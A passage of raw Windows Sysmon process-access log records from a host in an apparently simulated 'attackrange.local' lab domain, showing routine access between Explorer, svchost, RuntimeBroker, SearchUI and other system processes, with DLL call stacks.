indows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.795{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+b6ec|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.763{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.763{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.732{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+c0e0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.732{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+7d50|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+625f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5dfa|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ea2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5ff5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+7d50|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ac73|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c499|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4d7e|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4d7e|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f42ac|C:\Windows\System32\TwinUI.dll+f440a|C:\Windows\System32\TwinUI.dll+f4d7e|C:\Windows\System32\TwinUI.dll+154f93|C:\Windows\System32\TwinUI.dll+155ab3|C:\Windows\System32\TwinUI.dll+1565f7|C:\Windows\System32\TwinUI.dll+14880b|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+141c7c|C:\Windows\System32\TwinUI.dll+e7804|C:\Windows\System32\TwinUI.dll+e28fb|C:\Windows\System32\TwinUI.dll+1487f6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.592{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+7d50|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.592{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.592{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2a62a|C:\Windows\System32\TwinUI.dll+dd966|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.592{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.560{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.560{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da8